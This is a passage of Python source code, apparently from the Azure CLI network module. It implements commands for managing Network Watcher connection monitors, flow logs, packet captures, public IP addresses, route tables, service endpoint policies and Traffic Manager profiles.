else:
temp_test_groups = connection_monitor.test_groups
for test_group in temp_test_groups:
if name in test_group.sources:
test_group.sources.remove(name)
if name in test_group.destinations:
test_group.destinations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for endpoint in connection_monitor.endpoints:
if endpoint.name == name:
return endpoint
raise CLIError('unknown endpoint: {}'.format(name))
def list_nw_connection_monitor_v2_endpoint(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.endpoints
def add_nw_connection_monitor_v2_test_configuration(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
protocol,
test_groups,
frequency=None,
threshold_failed_percent=None,
threshold_round_trip_time=None,
preferred_ip_version=None,
tcp_port=None,
tcp_port_behavior=None,
tcp_disable_trace_route=None,
icmp_disable_trace_route=None,
http_port=None,
http_method=None,
http_path=None,
http_valid_status_codes=None,
http_prefer_https=None,
http_request_headers=None):
new_test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
name,
frequency,
protocol,
threshold_failed_percent,
threshold_round_trip_time,
preferred_ip_version,
tcp_port,
tcp_port_behavior,
tcp_disable_trace_route,
icmp_disable_trace_route,
http_port,
http_method,
http_path,
http_valid_status_codes,
http_prefer_https,
http_request_headers)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.test_configurations.append(new_test_config)
for test_group in connection_monitor.test_groups:
if test_group.name in test_groups:
test_group.test_configurations.append(new_test_config.name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name,
test_groups=None):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
# refresh test configurations
new_test_configurations = [t for t in connection_monitor.test_configurations if t.name != name]
connection_monitor.test_configurations = new_test_configurations
if test_groups is not None:
temp_test_groups = [t for t in connection_monitor.test_groups if t.name in test_groups]
else:
temp_test_groups = connection_monitor.test_groups
# refresh test groups
for test_group in temp_test_groups:
test_group.test_configurations.remove(name)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for test_config in connection_monitor.test_configurations:
if test_config.name == name:
return test_config
raise CLIError('unknown test configuration: {}'.format(name))
def list_nw_connection_monitor_v2_test_configuration(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_configurations
def add_nw_connection_monitor_v2_test_group(cmd,
client,
connection_monitor_name,
watcher_rg,
watcher_name,
location,
name,
endpoint_source_name,
endpoint_dest_name,
test_config_name,
disable=False,
endpoint_source_resource_id=None,
endpoint_source_address=None,
endpoint_dest_resource_id=None,
endpoint_dest_address=None,
test_config_frequency=None,
test_config_protocol=None,
test_config_preferred_ip_version=None,
test_config_threshold_failed_percent=None,
test_config_threshold_round_trip_time=None,
test_config_tcp_disable_trace_route=None,
test_config_tcp_port=None,
test_config_icmp_disable_trace_route=None,
test_config_http_port=None,
test_config_http_method=None,
test_config_http_path=None,
test_config_http_valid_status_codes=None,
test_config_http_prefer_https=None):
new_test_configuration_creation_requirements = [
test_config_protocol, test_config_preferred_ip_version,
test_config_threshold_failed_percent, test_config_threshold_round_trip_time,
test_config_tcp_disable_trace_route, test_config_tcp_port,
test_config_icmp_disable_trace_route,
test_config_http_port, test_config_http_method,
test_config_http_path, test_config_http_valid_status_codes, test_config_http_prefer_https
]
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_group = _create_nw_connection_monitor_v2_test_group(cmd,
name,
disable,
[], [], [])
# deal with endpoint
if any([endpoint_source_address, endpoint_source_resource_id]):
src_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_source_name,
endpoint_source_resource_id,
endpoint_source_address)
connection_monitor.endpoints.append(src_endpoint)
if any([endpoint_dest_address, endpoint_dest_resource_id]):
dst_endpoint = _create_nw_connection_monitor_v2_endpoint(cmd,
endpoint_dest_name,
endpoint_dest_resource_id,
endpoint_dest_address)
connection_monitor.endpoints.append(dst_endpoint)
new_test_group.sources.append(endpoint_source_name)
new_test_group.destinations.append(endpoint_dest_name)
# deal with test configuration
if any(new_test_configuration_creation_requirements):
test_config = _create_nw_connection_monitor_v2_test_configuration(cmd,
test_config_name,
test_config_frequency,
test_config_protocol,
test_config_threshold_failed_percent,
test_config_threshold_round_trip_time,
test_config_preferred_ip_version,
test_config_tcp_port,
test_config_tcp_disable_trace_route,
test_config_icmp_disable_trace_route,
test_config_http_port,
test_config_http_method,
test_config_http_path,
test_config_http_valid_status_codes,
test_config_http_prefer_https)
connection_monitor.test_configurations.append(test_config)
new_test_group.test_configurations.append(test_config_name)
connection_monitor.test_groups.append(new_test_group)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
new_test_groups, removed_test_group = [], None
for t in connection_monitor.test_groups:
if t.name == name:
removed_test_group = t
else:
new_test_groups.append(t)
if removed_test_group is None:
raise CLIError('test group: "{}" not exist'.format(name))
connection_monitor.test_groups = new_test_groups
# deal with endpoints which are only referenced by this removed test group
removed_endpoints = []
for e in removed_test_group.sources + removed_test_group.destinations:
tmp = [t for t in connection_monitor.test_groups if (e in t.sources or e in t.destinations)]
if not tmp:
removed_endpoints.append(e)
connection_monitor.endpoints = [e for e in connection_monitor.endpoints if e.name not in removed_endpoints]
# deal with test configurations which are only referenced by this remove test group
removed_test_configurations = []
for c in removed_test_group.test_configurations:
tmp = [t for t in connection_monitor.test_groups if c in t.test_configurations]
if not tmp:
removed_test_configurations.append(c)
connection_monitor.test_configurations = [c for c in connection_monitor.test_configurations
if c.name not in removed_test_configurations]
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def show_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
name):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
for t in connection_monitor.test_groups:
if t.name == name:
return t
raise CLIError('unknown test group: {}'.format(name))
def list_nw_connection_monitor_v2_test_group(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.test_groups
def add_nw_connection_monitor_v2_output(cmd,
client,
watcher_rg,
watcher_name,
connection_monitor_name,
location,
out_type,
workspace_id=None):
output = _create_nw_connection_monitor_v2_output(cmd, out_type, workspace_id)
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
if connection_monitor.outputs is None:
connection_monitor.outputs = []
connection_monitor.outputs.append(output)
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def remove_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
connection_monitor.outputs = []
return client.begin_create_or_update(watcher_rg, watcher_name, connection_monitor_name, connection_monitor)
def list_nw_connection_monitor_v2_output(client,
watcher_rg,
watcher_name,
connection_monitor_name,
location):
connection_monitor = client.get(watcher_rg, watcher_name, connection_monitor_name)
return connection_monitor.outputs
def show_topology_watcher(cmd, client, resource_group_name, network_watcher_name, target_resource_group_name=None,
target_vnet=None, target_subnet=None): # pylint: disable=unused-argument
TopologyParameters = cmd.get_models('TopologyParameters')
return client.get_topology(
resource_group_name=resource_group_name,
network_watcher_name=network_watcher_name,
parameters=TopologyParameters(
target_resource_group_name=target_resource_group_name,
target_virtual_network=target_vnet,
target_subnet=target_subnet
))
def check_nw_connectivity(cmd, client, watcher_rg, watcher_name, source_resource, source_port=None,
dest_resource=None, dest_port=None, dest_address=None,
resource_group_name=None, protocol=None, method=None, headers=None, valid_status_codes=None):
ConnectivitySource, ConnectivityDestination, ConnectivityParameters, ProtocolConfiguration, HTTPConfiguration = \
cmd.get_models(
'ConnectivitySource', 'ConnectivityDestination', 'ConnectivityParameters', 'ProtocolConfiguration',
'HTTPConfiguration')
params = ConnectivityParameters(
source=ConnectivitySource(resource_id=source_resource, port=source_port),
destination=ConnectivityDestination(resource_id=dest_resource, address=dest_address, port=dest_port),
protocol=protocol
)
if any([method, headers, valid_status_codes]):
params.protocol_configuration = ProtocolConfiguration(http_configuration=HTTPConfiguration(
method=method,
headers=headers,
valid_status_codes=valid_status_codes
))
return client.begin_check_connectivity(watcher_rg, watcher_name, params)
def check_nw_ip_flow(cmd, client, vm, watcher_rg, watcher_name, direction, protocol, local, remote,
resource_group_name=None, nic=None, location=None):
VerificationIPFlowParameters = cmd.get_models('VerificationIPFlowParameters')
try:
local_ip_address, local_port = local.split(':')
remote_ip_address, remote_port = remote.split(':')
except:
raise CLIError("usage error: the format of the '--local' and '--remote' should be like x.x.x.x:port")
if not is_valid_resource_id(vm):
if not resource_group_name:
raise CLIError("usage error: --vm NAME --resource-group NAME | --vm ID")
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
if not resource_group_name:
raise CLIError("usage error: --nic NAME --resource-group NAME | --nic ID")
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_verify_ip_flow(
watcher_rg, watcher_name,
VerificationIPFlowParameters(
target_resource_id=vm, direction=direction, protocol=protocol, local_port=local_port,
remote_port=remote_port, local_ip_address=local_ip_address,
remote_ip_address=remote_ip_address, target_nic_resource_id=nic))
def show_nw_next_hop(cmd, client, resource_group_name, vm, watcher_rg, watcher_name,
source_ip, dest_ip, nic=None, location=None):
NextHopParameters = cmd.get_models('NextHopParameters')
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
if nic and not is_valid_resource_id(nic):
nic = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Network', type='networkInterfaces', name=nic)
return client.begin_get_next_hop(
watcher_rg, watcher_name, NextHopParameters(target_resource_id=vm,
source_ip_address=source_ip,
destination_ip_address=dest_ip,
target_nic_resource_id=nic))
def show_nw_security_view(cmd, client, resource_group_name, vm, watcher_rg, watcher_name, location=None):
if not is_valid_resource_id(vm):
vm = resource_id(
subscription=get_subscription_id(cmd.cli_ctx), resource_group=resource_group_name,
namespace='Microsoft.Compute', type='virtualMachines', name=vm)
security_group_view_parameters = cmd.get_models('SecurityGroupViewParameters')(target_resource_id=vm)
return client.begin_get_vm_security_rules(watcher_rg, watcher_name, security_group_view_parameters)
def create_nw_packet_capture(cmd, client, resource_group_name, capture_name, vm,
watcher_rg, watcher_name, location=None,
storage_account=None, storage_path=None, file_path=None,
capture_size=None, capture_limit=None, time_limit=None, filters=None):
PacketCapture, PacketCaptureStorageLocation = cmd.get_models('PacketCapture', 'PacketCaptureStorageLocation')
storage_settings = PacketCaptureStorageLocation(storage_id=storage_account,
storage_path=storage_path, file_path=file_path)
capture_params = PacketCapture(target=vm, storage_location=storage_settings,
bytes_to_capture_per_packet=capture_size,
total_bytes_per_session=capture_limit, time_limit_in_seconds=time_limit,
filters=filters)
return client.begin_create(watcher_rg, watcher_name, capture_name, capture_params)
def set_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, nsg, storage_account=None,
resource_group_name=None, enabled=None, retention=0, log_format=None, log_version=None,
traffic_analytics_workspace=None, traffic_analytics_interval=None,
traffic_analytics_enabled=None):
from azure.cli.core.commands import LongRunningOperation
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
config = LongRunningOperation(cmd.cli_ctx)(client.begin_get_flow_log_status(watcher_rg,
watcher_name,
flowlog_status_parameters))
try:
if not config.flow_analytics_configuration.network_watcher_flow_analytics_configuration.workspace_id:
config.flow_analytics_configuration = None
except AttributeError:
config.flow_analytics_configuration = None
with cmd.update_context(config) as c:
c.set_param('enabled', enabled if enabled is not None else config.enabled)
c.set_param('storage_id', storage_account or config.storage_id)
if retention is not None:
config.retention_policy = {
'days': retention,
'enabled': int(retention) > 0
}
if cmd.supported_api_version(min_api='2018-10-01') and (log_format or log_version):
config.format = {
'type': log_format,
'version': log_version
}
if cmd.supported_api_version(min_api='2018-10-01') and \
any([traffic_analytics_workspace is not None, traffic_analytics_enabled is not None]):
workspace = None
if traffic_analytics_workspace:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not config.flow_analytics_configuration:
# must create whole object
if not workspace:
raise CLIError('usage error (analytics not already configured): --workspace NAME_OR_ID '
'[--enabled {true|false}]')
if traffic_analytics_enabled is None:
traffic_analytics_enabled = True
config.flow_analytics_configuration = {
'network_watcher_flow_analytics_configuration': {
'enabled': traffic_analytics_enabled,
'workspace_id': workspace.properties['customerId'],
'workspace_region': workspace.location,
'workspace_resource_id': traffic_analytics_workspace,
'traffic_analytics_interval': traffic_analytics_interval
}
}
else:
# pylint: disable=line-too-long
with cmd.update_context(config.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
# update object
c.set_param('enabled', traffic_analytics_enabled)
if traffic_analytics_workspace == "":
config.flow_analytics_configuration = None
elif workspace:
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', traffic_analytics_workspace)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return client.begin_set_flow_log_configuration(watcher_rg, watcher_name, config)
# combination of resource_group_name and nsg is for old output
# combination of location and flow_log_name is for new output
def show_nsg_flow_logging(cmd, client, watcher_rg, watcher_name, location=None, resource_group_name=None, nsg=None,
flow_log_name=None):
# deprecated approach to show flow log
if nsg is not None:
flowlog_status_parameters = cmd.get_models('FlowLogStatusParameters')(target_resource_id=nsg)
return client.begin_get_flow_log_status(watcher_rg, watcher_name, flowlog_status_parameters)
# new approach to show flow log
from ._client_factory import cf_flow_logs
client = cf_flow_logs(cmd.cli_ctx, None)
return client.get(watcher_rg, watcher_name, flow_log_name)
def create_nw_flow_log(cmd,
client,
location,
watcher_rg,
watcher_name,
flow_log_name,
nsg,
storage_account=None,
resource_group_name=None,
enabled=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
FlowLog = cmd.get_models('FlowLog')
flow_log = FlowLog(location=location,
target_resource_id=nsg,
storage_id=storage_account,
enabled=enabled,
tags=tags)
if retention > 0:
RetentionPolicyParameters = cmd.get_models('RetentionPolicyParameters')
retention_policy = RetentionPolicyParameters(days=retention, enabled=(retention > 0))
flow_log.retention_policy = retention_policy
if log_format is not None or log_version is not None:
FlowLogFormatParameters = cmd.get_models('FlowLogFormatParameters')
format_config = FlowLogFormatParameters(type=log_format, version=log_version)
flow_log.format = format_config
if traffic_analytics_workspace is not None:
TrafficAnalyticsProperties, TrafficAnalyticsConfigurationProperties = \
cmd.get_models('TrafficAnalyticsProperties', 'TrafficAnalyticsConfigurationProperties')
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
traffic_analytics_config = TrafficAnalyticsConfigurationProperties(
enabled=traffic_analytics_enabled,
workspace_id=workspace.properties['customerId'],
workspace_region=workspace.location,
workspace_resource_id=workspace.id,
traffic_analytics_interval=traffic_analytics_interval
)
traffic_analytics = TrafficAnalyticsProperties(
network_watcher_flow_analytics_configuration=traffic_analytics_config
)
flow_log.flow_analytics_configuration = traffic_analytics
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, flow_log)
def update_nw_flow_log_getter(client, watcher_rg, watcher_name, flow_log_name):
return client.get(watcher_rg, watcher_name, flow_log_name)
def update_nw_flow_log_setter(client, watcher_rg, watcher_name, flow_log_name, parameters):
return client.begin_create_or_update(watcher_rg, watcher_name, flow_log_name, parameters)
def update_nw_flow_log(cmd,
instance,
location,
resource_group_name=None, # dummy parameter to let it appear in command
enabled=None,
nsg=None,
storage_account=None,
retention=0,
log_format=None,
log_version=None,
traffic_analytics_workspace=None,
traffic_analytics_interval=60,
traffic_analytics_enabled=None,
tags=None):
with cmd.update_context(instance) as c:
c.set_param('enabled', enabled)
c.set_param('tags', tags)
c.set_param('storage_id', storage_account)
c.set_param('target_resource_id', nsg)
with cmd.update_context(instance.retention_policy) as c:
c.set_param('days', retention)
c.set_param('enabled', retention > 0)
with cmd.update_context(instance.format) as c:
c.set_param('type', log_format)
c.set_param('version', log_version)
if traffic_analytics_workspace is not None:
from azure.cli.core.commands.arm import get_arm_resource_by_id
workspace = get_arm_resource_by_id(cmd.cli_ctx, traffic_analytics_workspace)
if not workspace:
raise CLIError('Name or ID of workspace is invalid')
if instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration is None:
analytics_conf = cmd.get_models('TrafficAnalyticsConfigurationProperties')
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration = analytics_conf()
with cmd.update_context(
instance.flow_analytics_configuration.network_watcher_flow_analytics_configuration) as c:
c.set_param('enabled', traffic_analytics_enabled)
c.set_param('workspace_id', workspace.properties['customerId'])
c.set_param('workspace_region', workspace.location)
c.set_param('workspace_resource_id', workspace.id)
c.set_param('traffic_analytics_interval', traffic_analytics_interval)
return instance
def list_nw_flow_log(client, watcher_rg, watcher_name, location):
return client.list(watcher_rg, watcher_name)
def delete_nw_flow_log(client, watcher_rg, watcher_name, location, flow_log_name):
return client.begin_delete(watcher_rg, watcher_name, flow_log_name)
def start_nw_troubleshooting(cmd, client, watcher_name, watcher_rg, resource, storage_account,
storage_path, resource_type=None, resource_group_name=None,
no_wait=False):
TroubleshootingParameters = cmd.get_models('TroubleshootingParameters')
params = TroubleshootingParameters(target_resource_id=resource, storage_id=storage_account,
storage_path=storage_path)
return sdk_no_wait(no_wait, client.begin_get_troubleshooting, watcher_rg, watcher_name, params)
def show_nw_troubleshooting_result(cmd, client, watcher_name, watcher_rg, resource, resource_type=None,
resource_group_name=None):
query_troubleshooting_parameters = cmd.get_models('QueryTroubleshootingParameters')(target_resource_id=resource)
return client.begin_get_troubleshooting_result(watcher_rg, watcher_name, query_troubleshooting_parameters)
def run_network_configuration_diagnostic(cmd, client, watcher_rg, watcher_name, resource,
direction=None, protocol=None, source=None, destination=None,
destination_port=None, queries=None,
resource_group_name=None, resource_type=None, parent=None):
NetworkConfigurationDiagnosticParameters, NetworkConfigurationDiagnosticProfile = \
cmd.get_models('NetworkConfigurationDiagnosticParameters', 'NetworkConfigurationDiagnosticProfile')
if not queries:
queries = [NetworkConfigurationDiagnosticProfile(
direction=direction,
protocol=protocol,
source=source,
destination=destination,
destination_port=destination_port
)]
params = NetworkConfigurationDiagnosticParameters(target_resource_id=resource, profiles=queries)
return client.begin_get_network_configuration_diagnostic(watcher_rg, watcher_name, params)
# endregion
# region CustomIpPrefix
def create_custom_ip_prefix(cmd, client, resource_group_name, custom_ip_prefix_name, location=None,
cidr=None, tags=None, zone=None, signed_message=None, authorization_message=None,
custom_ip_prefix_parent=None, no_wait=False):
CustomIpPrefix = cmd.get_models('CustomIpPrefix')
prefix = CustomIpPrefix(
location=location,
cidr=cidr,
zones=zone,
tags=tags,
signed_message=signed_message,
authorization_message=authorization_message
)
if custom_ip_prefix_parent:
try:
prefix.custom_ip_prefix_parent = client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError("Custom ip prefix parent {} doesn't exist".format(custom_ip_prefix_name))
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, custom_ip_prefix_name, prefix)
def update_custom_ip_prefix(instance,
signed_message=None,
authorization_message=None,
tags=None,
commissioned_state=None):
if tags is not None:
instance.tags = tags
if signed_message is not None:
instance.signed_message = signed_message
if authorization_message is not None:
instance.authorization_message = authorization_message
if commissioned_state is not None:
instance.commissioned_state = commissioned_state[0].upper() + commissioned_state[1:] + 'ing'
return instance
# endregion
# region PublicIPAddresses
def create_public_ip(cmd, resource_group_name, public_ip_address_name, location=None, tags=None,
allocation_method=None, dns_name=None,
idle_timeout=4, reverse_fqdn=None, version=None, sku=None, tier=None, zone=None, ip_tags=None,
public_ip_prefix=None, edge_zone=None, ip_address=None):
IPAllocationMethod, PublicIPAddress, PublicIPAddressDnsSettings, SubResource = cmd.get_models(
'IPAllocationMethod', 'PublicIPAddress', 'PublicIPAddressDnsSettings', 'SubResource')
client = network_client_factory(cmd.cli_ctx).public_ip_addresses
if not allocation_method:
allocation_method = IPAllocationMethod.static.value if (sku and sku.lower() == 'standard') \
else IPAllocationMethod.dynamic.value
public_ip_args = {
'location': location,
'tags': tags,
'public_ip_allocation_method': allocation_method,
'idle_timeout_in_minutes': idle_timeout,
'ip_address': ip_address,
'dns_settings': None
}
if cmd.supported_api_version(min_api='2016-09-01'):
public_ip_args['public_ip_address_version'] = version
if cmd.supported_api_version(min_api='2017-06-01'):
public_ip_args['zones'] = zone
if cmd.supported_api_version(min_api='2017-11-01'):
public_ip_args['ip_tags'] = ip_tags
if cmd.supported_api_version(min_api='2018-07-01') and public_ip_prefix:
public_ip_args['public_ip_prefix'] = SubResource(id=public_ip_prefix)
if sku:
public_ip_args['sku'] = {'name': sku}
if tier:
if not sku:
public_ip_args['sku'] = {'name': 'Basic'}
public_ip_args['sku'].update({'tier': tier})
public_ip = PublicIPAddress(**public_ip_args)
if dns_name or reverse_fqdn:
public_ip.dns_settings = PublicIPAddressDnsSettings(
domain_name_label=dns_name,
reverse_fqdn=reverse_fqdn)
if edge_zone:
public_ip.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_address_name, public_ip)
def update_public_ip(cmd, instance, dns_name=None, allocation_method=None, version=None,
idle_timeout=None, reverse_fqdn=None, tags=None, sku=None, ip_tags=None,
public_ip_prefix=None):
if dns_name is not None or reverse_fqdn is not None:
if instance.dns_settings:
if dns_name is not None:
instance.dns_settings.domain_name_label = dns_name
if reverse_fqdn is not None:
instance.dns_settings.reverse_fqdn = reverse_fqdn
else:
PublicIPAddressDnsSettings = cmd.get_models('PublicIPAddressDnsSettings')
instance.dns_settings = PublicIPAddressDnsSettings(domain_name_label=dns_name, fqdn=None,
reverse_fqdn=reverse_fqdn)
if allocation_method is not None:
instance.public_ip_allocation_method = allocation_method
if version is not None:
instance.public_ip_address_version = version
if idle_timeout is not None:
instance.idle_timeout_in_minutes = idle_timeout
if tags is not None:
instance.tags = tags
if sku is not None:
instance.sku.name = sku
if ip_tags:
instance.ip_tags = ip_tags
if public_ip_prefix:
SubResource = cmd.get_models('SubResource')
instance.public_ip_prefix = SubResource(id=public_ip_prefix)
return instance
def create_public_ip_prefix(cmd, client, resource_group_name, public_ip_prefix_name, prefix_length,
version=None, location=None, tags=None, zone=None, edge_zone=None,
custom_ip_prefix_name=None):
PublicIPPrefix, PublicIPPrefixSku = cmd.get_models('PublicIPPrefix', 'PublicIPPrefixSku')
prefix = PublicIPPrefix(
location=location,
prefix_length=prefix_length,
sku=PublicIPPrefixSku(name='Standard'),
tags=tags,
zones=zone
)
if cmd.supported_api_version(min_api='2019-08-01'):
prefix.public_ip_address_version = version if version is not None else 'ipv4'
if cmd.supported_api_version(min_api='2020-06-01') and custom_ip_prefix_name:
cip_client = network_client_factory(cmd.cli_ctx).custom_ip_prefixes
try:
prefix.custom_ip_prefix = cip_client.get(resource_group_name, custom_ip_prefix_name)
except ResourceNotFoundError:
raise ResourceNotFoundError('Custom ip prefix {} doesn\'t exist.'.format(custom_ip_prefix_name))
if edge_zone:
prefix.extended_location = _edge_zone_model(cmd, edge_zone)
return client.begin_create_or_update(resource_group_name, public_ip_prefix_name, prefix)
def update_public_ip_prefix(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region RouteFilters
def create_route_filter(cmd, client, resource_group_name, route_filter_name, location=None, tags=None):
RouteFilter = cmd.get_models('RouteFilter')
return client.begin_create_or_update(resource_group_name, route_filter_name,
RouteFilter(location=location, tags=tags))
def list_route_filters(client, resource_group_name=None):
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def create_route_filter_rule(cmd, client, resource_group_name, route_filter_name, rule_name, access, communities,
location=None):
RouteFilterRule = cmd.get_models('RouteFilterRule')
return client.begin_create_or_update(resource_group_name, route_filter_name, rule_name,
RouteFilterRule(access=access, communities=communities,
location=location))
# endregion
# region RouteTables
def create_route_table(cmd, resource_group_name, route_table_name, location=None, tags=None,
disable_bgp_route_propagation=None):
RouteTable = cmd.get_models('RouteTable')
ncf = network_client_factory(cmd.cli_ctx)
route_table = RouteTable(location=location, tags=tags)
if cmd.supported_api_version(min_api='2017-10-01'):
route_table.disable_bgp_route_propagation = disable_bgp_route_propagation
return ncf.route_tables.begin_create_or_update(resource_group_name, route_table_name, route_table)
def update_route_table(instance, tags=None, disable_bgp_route_propagation=None):
if tags == '':
instance.tags = None
elif tags is not None:
instance.tags = tags
if disable_bgp_route_propagation is not None:
instance.disable_bgp_route_propagation = disable_bgp_route_propagation
return instance
def create_route(cmd, resource_group_name, route_table_name, route_name, next_hop_type, address_prefix,
next_hop_ip_address=None):
Route = cmd.get_models('Route')
route = Route(next_hop_type=next_hop_type, address_prefix=address_prefix,
next_hop_ip_address=next_hop_ip_address, name=route_name)
ncf = network_client_factory(cmd.cli_ctx)
return ncf.routes.begin_create_or_update(resource_group_name, route_table_name, route_name, route)
def update_route(instance, address_prefix=None, next_hop_type=None, next_hop_ip_address=None):
if address_prefix is not None:
instance.address_prefix = address_prefix
if next_hop_type is not None:
instance.next_hop_type = next_hop_type
if next_hop_ip_address is not None:
instance.next_hop_ip_address = next_hop_ip_address
return instance
# endregion
# region ServiceEndpoints
def create_service_endpoint_policy(cmd, resource_group_name, service_endpoint_policy_name, location=None, tags=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
ServiceEndpointPolicy = cmd.get_models('ServiceEndpointPolicy')
policy = ServiceEndpointPolicy(tags=tags, location=location)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name, policy)
def list_service_endpoint_policies(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policies
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
def update_service_endpoint_policy(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
def create_service_endpoint_policy_definition(cmd, resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, service, service_resources,
description=None):
client = network_client_factory(cmd.cli_ctx).service_endpoint_policy_definitions
ServiceEndpointPolicyDefinition = cmd.get_models('ServiceEndpointPolicyDefinition')
policy_def = ServiceEndpointPolicyDefinition(description=description, service=service,
service_resources=service_resources)
return client.begin_create_or_update(resource_group_name, service_endpoint_policy_name,
service_endpoint_policy_definition_name, policy_def)
def update_service_endpoint_policy_definition(instance, service=None, service_resources=None, description=None):
if service is not None:
instance.service = service
if service_resources is not None:
instance.service_resources = service_resources
if description is not None:
instance.description = description
return instance
# endregion
# region TrafficManagers
def list_traffic_manager_profiles(cmd, resource_group_name=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list_by_subscription()
def create_traffic_manager_profile(cmd, traffic_manager_profile_name, resource_group_name,
routing_method, unique_dns_name, monitor_path=None,
monitor_port=80, monitor_protocol=MonitorProtocol.http.value,
profile_status=ProfileStatus.enabled.value,
ttl=30, tags=None, interval=None, timeout=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
from azure.mgmt.trafficmanager import TrafficManagerManagementClient
from azure.mgmt.trafficmanager.models import Profile, DnsConfig, MonitorConfig
client = get_mgmt_service_client(cmd.cli_ctx, TrafficManagerManagementClient).profiles
if monitor_path is None and monitor_protocol == 'HTTP':
monitor_path = '/'
profile = Profile(location='global', tags=tags, profile_status=profile_status,
traffic_routing_method=routing_method,
dns_config=DnsConfig(relative_name=unique_dns_name, ttl=ttl),
monitor_config=MonitorConfig(protocol=monitor_protocol,
port=monitor_port,
path=monitor_path,
interval_in_seconds=interval,
timeout_in_seconds=timeout,
tolerated_number_of_failures=max_failures,
custom_headers=monitor_custom_headers,
expected_status_code_ranges=status_code_ranges),
max_return=max_return)
return client.create_or_update(resource_group_name, traffic_manager_profile_name, profile)
def update_traffic_manager_profile(instance, profile_status=None, routing_method=None, tags=None,
monitor_protocol=None, monitor_port=None, monitor_path=None,
ttl=None, timeout=None, interval=None, max_failures=None,
monitor_custom_headers=None, status_code_ranges=None, max_return=None):
if tags is not None:
instance.tags = tags
if profile_status is not None:
instance.profile_status = profile_status
if routing_method is not None:
instance.traffic_routing_method = routing_method
if ttl is not None:
instance.dns_config.ttl = ttl
if monitor_protocol is not None:
instance.monitor_config.protocol = monitor_protocol
if monitor_port is not None:
